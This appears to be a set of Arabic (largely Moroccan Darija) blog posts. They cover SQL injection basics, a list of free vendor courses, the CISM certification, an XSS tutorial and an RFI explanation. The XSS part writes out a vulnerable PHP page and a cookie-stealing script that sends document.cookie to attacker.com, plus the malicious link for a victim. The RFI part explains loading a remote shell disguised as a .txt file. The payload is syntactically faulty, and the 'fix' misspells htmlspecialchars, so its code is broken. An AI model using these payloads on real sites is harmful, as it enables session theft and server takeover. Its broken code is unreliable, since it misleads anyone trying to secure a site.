SQL Injection

 انحاولو نتعرفو على ثغرة SQL Injection الخطيرة باختصار .

اولا SQl هي لغة التعامل مع قواعد البيانات او لغة استعلام قواعد البيانات اما SQL Injection فهي ثغرة خطيرة تتكون في المواقع والتطبيقات لي كتعامل مع قواعد البيانات , وخصوصا مني مكيكونش واحد فلتر للمدخلات بحيت اقدر المهاجم اقوم بحقن بيانات خبيثة في التطبيق وكيرسل Query لقواعد البيانات باج ياخد المعلومات , وكيولي يقدر اتواصل مع قواعد البيانات ويجلب منها اي بيانات بغاها .

اما بالنسبة لانواع SQL Injection فهي كثيرة لكن غنتعرفو على 2 انواع وهي لي منتشرة بزااف  In-band SQLi وهي بدورها كتنقاسم لعدة انواع بحال Error-Based و Union-based و النوع الثاني هو Blind SQL وهو ايضا كينقاسم لعدة انواع بحال Boolean based SQLI و Time-Based.

افضل الكورسات الاونلاين مجانا

 تجميعة بافضل الكورسات الاونلاين مجانا مقدمة من الشركات العالمية في عدة مجالات

جوجل

مهارات رقمية - خدمات جوجل - اساسيات البرمجة والتعلم الالي - التسويق الرقمي

الرابط (AR):

https://learndigital.withgoogle.com/maharatgoogle

الرابط (EN):

https://learndigital.withgoogle.com/digitalgarage

G Suite - Google Cloud - Google Assistant - Google Maps - Google Pays - Firebase - TensorFlow - Go - Dart - Flutter - Python - Web

الرابط (الموضوعات):

https://developers.google.com/learn/topics

الرابط (مسارات):

https://developers.google.com/learn/pathways

المختبرات: G Suite - Google Cloud - Google Assistant - Google Maps - Data - ML - الذكاء الاصطناعي - Firebase -

الرابط:

https://google.qwiklabs.com

اعلانات جوجل - مدير اعلانات جوجل - منصة تسويق جوجل - تحليلات جوجل - جوجل ماي بيزنس

الرابط:

https://skillshop.withgoogle.com

Google Analytics - Google Tag Manager

الرابط:

https://analytics.google.com/analytics/academy

استكشف علوم الحاسوب (ساعة الرمز مع سي اس اولا من اي مكان)

الرابط:

https://csfirst.withgoogle.com/s/en/hourofcode

تعلم الالات - تدفق التوتر

الرابط: https://developers.google.com/machine-learning/crash-course

IBM

IBM الرقمية - Nation Africa (للمستخدمين في افريقيا)

الترميز - التفكير في التصميم - الويب - السحاب - الذكاء الاصطناعي - IoT - سلسلة بلوك - علوم البيانات - الامن السيبراني - DevOps - حوسبة الكم

الرابط:

www.digitalnationafrica.com

مبادرة IBM الاكاديمية

الرابط:

https://www.ibm.com/academic

الفصل المعرفي - علوم البيانات والحوسبة المعرفية

الرابط:

https://cognitiveclass.ai

اكاديمية IBM لتعلم الامن

الرابط:

https://www.securitylearningacademy.com

بحث IBM

الرابط:

https://www.research.ibm.com

شهادات IBM

الرابط:

https://www.ibm.com/certify/certs

مايكروسوفت

مايكروسوفت 365-ازور - منصة باور - ديناميكس 365 NET - GitHub - Microsoft Graph - مجموعة تطوير الكم - سيرفر S QL - Visual Studio

الرابط (تعلم):

https://docs.microsoft.com/en-us/learn

الرابط (الجامعات): 

https://docs.microsoft.com/en-us/learn/topics/universities

الرابط (الشهادات):

https://docs.microsoft.com/en-us/learn/certifications

مايكروسوفت AI School

الرابط:

https://www.microsoft.com/en-us/ai/ai-school

مجتمع مايكروسوفت كلاود (الدور: مدير: حل - مهندس معماري - مطور - مهندس ذكاء صناعي - مستخدم اعمال - استشاري وظيفي - مهندس بيانات - مهندس امن - مهندس ديفوبس - عالم بيانات - محلل بيانات - مدير قاعدة بيانات)

الرابط:

https://cloudsociety.microsoft.com/Learn.aspx

Amazon.com

AWS Cloud - Compute - ML - التواصل - DevOps - الامن - IoT - وسائل الاعلام وخدمات البث

الرابط: 

https://www.aws.training

التدريب والشهادة AWS

الرابط:

https://aws.amazon.com/training

AWS - تعلم الالة

الرابط:

https://aws.amazon.com/training/learn-about/machine-learning

Huawei

مواهب هواوي (التوجيه والتبديل - WLAN 5 G - حوسبة سحابة - خدمة سحابة - تخزين - حوسبة ذكية - بيانات كبيرة - IoT - الذكاء الاصطناعي - الامن)

الرابط: 

https://e.huawei.com/en/talent/

اكاديمية هواوي كلاود

الرابط:

 https://edu.huaweicloud.com/intl/en-us

VMware

VMware Learning (متعدد الغيوم - شبكة السحاب الافتراضية - مساحة العمل الرقمية - تحديث التطبيقات - الامان)

الرابط: https://www.vmware.com/learning.html

الرابط: 

https://mylearn.vmware.com/portals/www/search/results.cfm

اكاديمية VMware IT (سحابة - افتراضية - تخزين - شبكة افتراضية)

الرابط:

https://www.netdevgroup.com/online/content/vmita

اوراكل

جامعة اوراكل (قاعدة بيانات - جافا - سحابة)

الرابط:

 https://education.oracle.com

NVIDIA

نفيديا التعلم العميق

الرابط:

 https://www.nvidia.com/en-us/deep-learning-ai/education/

سيسكو

شبكة (CCNA - CCNP - NIS) - الامن السيبراني - IoT - بايثون - لينكس - ريادة الاعمال

الرابط: https://www.netacad.com

HP

hp life (اتصال - بدء - ابتكار - تمويل - تسويق - عمليات)

الرابط: 

https://www.life-global.org/allcourses?page=1

ديل

سحابة - بنية تحتية متقاربة - حماية البيانات - علوم البيانات - سطح المكتب - شبكة - امان - سيرفرات - تخزين - افتراضية

الرابط:

https://education.dellemc.com/content/emc/en-us/home.html

Facebook Blueprint (فيسبوك - اعلانات - خيارات شراء - استهداف الجمهور المناسب - بناء الوعي - دفع الاعتبار - توليد العملاء المحتملين - ترويج تطبيقي - زيادة المبيعات عبر الانترنت - زيادة المبيعات في المتجر - اختر تنسيقات الاعلانات - احصل على الهام ابداعي - ادارة الاعلانات - قياس الاداء الاعلاني - تعرف على Messenger - تعرف على Instagram - وزع المحتوى وتحقيق الارباح - بناء المجتمع)

الرابط:

https://www.facebookblueprint.com/student/catalog

الرابط:

 https://www.facebook.com/business/learn/certification

لينكد ان

منصة التعليم عبر الانترنت بواسطة Linkedin (مطوري البرمجيات، مسؤولي تكنولوجيا المعلومات، و.....)

الرابط: 

https://www.linkedin.com/learning/

Pluralsight

منصة التعليم عبر الانترنت (مطوري البرمجيات، اداري تكنولوجيا المعلومات، و.....)

الرابط:

https://www.pluralsightone.org/product/free

اهم الشهادات في مجال الامن السيبراني

نتعرفو على اهم الشهادات في مجال الامن السيبراني والامن المعلوماتي وهي مطلوبة وكتعبر من اكثر الشهادات دخلا لي قدر يحصل عليها وهادشي ماشي كلام فارغ وانما هي فعلا شهاداة احترافية وكتستحق هي وبعض الشهادات الاخرى لي مزال اندويو عليها وهي شهادة CISM .

شنو هي شهادة CISM ؟

شهادة CISM هي من الشهادات المتقدمة في مجال الامن السيبراني والامن المعلوماتي ولي حصل على هاد الشهادة كيكون مختص في تطوير الاستراتجية الامنية للحكومات والشركات والمنضمات ولي كيقدم هاد الشهادة هي رابطة ISACA المشهورة لي كتواجد في USA وتاسست سنة 1968 وهاد الرابطة هي لي كتقدم اشهر الشهاداة المرموقة والمطلوبة في مجال الامن السيبراني بحال CISA و CRISC  و COBIT لي مجال اندويو عليهم ان شاء الله .

وكتعتبر شهادة CISM هم اهم الشهادات في هاد المجال وكتستحق انك تحاول تاخد هاد الشهادة لانه فعلا مطلوبة وعلى تقرير نشراتو مجلة Global Knowlodge فسنة 2020 فصنفات شهادة CISM في المركز الثالث في قائمة اعلى 15 شهادة في المجال التقني في USA والاولى على مستوى الامن السيبراني والامن المعلوماتي وكتحتل المركز الثالث في شهادات الامن السيبراني في اوروبا وافريقيا  والرابع في الشرق الاوسط حسب التقرير نفسه , ولكن التكاليف للحصول على الشهادة عالية شوية فكتحتاج ما يقارب ل 500$ تال 800$ تقريبا للاختبار و بواقع 20 ساعة تدريبية سنويا ومجموع 120 ساعة ساعة خاصك تحققها في ثلاث سنوات .

والشروط باش تحصل على الشهادة , خاصك دوز في الاختبار بنجاح وكتحتاج خبرة 5 سنوات في 3 مجالات من 4 مجالات لي كتكون في الاختبار و خبرة سنتين الى عندك الماستر في مجال الامن السيبراني , وبعض الشروط الاخرى الثانوية لي كتغير باستمرار .

من اكثر الشهادات القريبة لشهادة CISM هي شهادة CISSP فالفرق بينهم ان كلا الشهادتين كيهتمو بالجانب التقني والاداري ولكن شهادة CISM بالجانب الاستراتيجي و الاداري بينما الشهادة الاخرى كتهتم بالجانب التقني اكثر وهما شهادات كيكملو بعضهم البعض والى خديتهم ب 2 غطور بيهم البروفايل ديالك في المجال .

اما بالنسبة لمحتوى الشهادة فكينقسم ل 4 مجالات وهما 

اولا Information Security Governance  

وهاد المجال كيشكل 24% من الاسئلة لي كتطرح في الاختبار ديال الشهادة 

ثانيا Information Risk Management and Compliance 

وهاد المجال هو اكثر مجال كتطرح في الاسئلة في الاختبار بحيت ثلث الاسئلة لي في الاختبار كتكون فهاد المجال .

ثالثا Information Security Program Development and Management 

كيتعتبر هاذا المجال الثاني من حيت عدد الاسئلة في الاختبار بحيت ربع الاسئلة كتكون من هاد المجال .

رابعا .Information Security Incident Management

وهو اقل مجال كيتطرحو في الاسئلة في الاختبار بمجموع 15% 

اما بالنسبة للاختبار فكيكون مجموع الاسئلة فيه هو 150 سؤال ومدة الاختبار هي 4 ساعات , اما طريقة باش كتطرح الاسئلة فغنحاول نخلي ليكم الصور في التعليقات لانه اذا كتبناها هنا غيكون بوسط طويل وممل .

خلاصة 

شهادة CISM هي شهادة زوينة واحترافية وتستاهل تضحي الغالي والنفيس باش تحصل عليها لانه فعليا غطور البروفيل ديالك في مجال الامن السيبراني وراه كاينيني بزااف دالناس لي حصلو عليها عرب واجانب تقدر تسولهم على اي حاجة متعلق باشهادة وانشاء الله نحصل عليها .

xss attack

 xss attack

هاد الثغرة كتمكنك انك تقدر تسرق sessions ديال المستخدمين لي في الموقع

نشوفو هاد شي بشكل تطبيقي باش نفهمو كتر مثلا

<html>

<body>

<form action="http://site.com/search.php" method="get">

<input type="text" name="q">

<input type="submit" value="search">

</form>

<?php

$q=$_GET['q'];

echo $q;

?>

</body></html>

هاد script الوضيفة ديالو انك كتكتب شي حاجة وكيطبعها في الصفحة بلا حتا شي فيلتر يعني تقدر تحقن شي اكواد javascript خبيثة في هاديك الصفحة

ندوزو للاستغلال وغادي تفهم لبلان كيفاش دير

attacker فاش غادي يبغي يستاغل هاد الثغرة غادي يشد الرابط ديال الصفحة لي هو

http://site.com/search.php

والاسم ديال input لي هو في حالتنا q

وغادي يزيد عليه الكود ديال javascript لي غادي يسرق بيه session

<script>location.href=http://attacker.com/session.php?s=document.cookie;</script>

هدا سكريبت javascript بسيط كتقدر تاخد cookie ديال المستخدم وكتحولو لموقع attacker

المهم غادي تجمع هاد شي كامل وغادي تصيفطو للضحية على شكل رابط

http://site.com/search.php?q<script>location.href=http://attacker.com/session.php?s=document.cookie;</script>

مني غادي يدخل الضحية هاد الرابط غادي يتم تحويل الكوكيز ديال الضحية لموقع attacker

دبا كيفاش غادي نحمي الموقع ديالي من بحال هاد الثغرات

الجواب هو انك غادي تزيد واحد الدالة في الكود ديالك في جميع المدخلات لي عندك في الموقع ولي هي htmlspecialchars()

<html>

<body>

<form action="http://site.com/search.php" method="get">

<input type="text" name="q">

<input type="submit" value="search">

</form>

<?php

$q=$_GET['q'];

echo htmlspiciealchars($q);

?>

</body></html>

ما هي ثغرة RFI ؟

 ما هي ثغرة RFI ؟

RFI : Remote File Include

هي ثغرة تقوم بعرض ملفات من مواقع اخرى داخل الموقع المصاب بهذه الثغرة

- - - - - - - - - - - - - - - - - - - - - - - - -

شرح :

مثلا اذا كان الرابط هكذا :

site.com/file.php?page=file1.html

تلقائيا ستفترض ان الملف التالي هو file2.html

يعني ان الموقع يقوم بعمل include للملفات

الثغرة هي ان تقوم بعرض ملف من موقع اخر داخل هذا الموقع

☜︎︎︎ يعني هكذا : 

site.com/file.php?page=https://www.site2.com/hacked.html

الان يسقوم الموقع بعرض ملف hacked.html بدل من file1.html

كيف تتحكم بالموقع بدل من عرض الملفات فقط؟

بكل سهولة ستضع رابط شيل بدل من ملف الhtml

- - - - - - - - - - - - - - - - - - - - - - - - -

ملاحظة:  لا يمكنك عرض الشيل اذا كان بأمتداد php. 

حول الشيل الى txt. حتى تتم قرائته على السيرفر.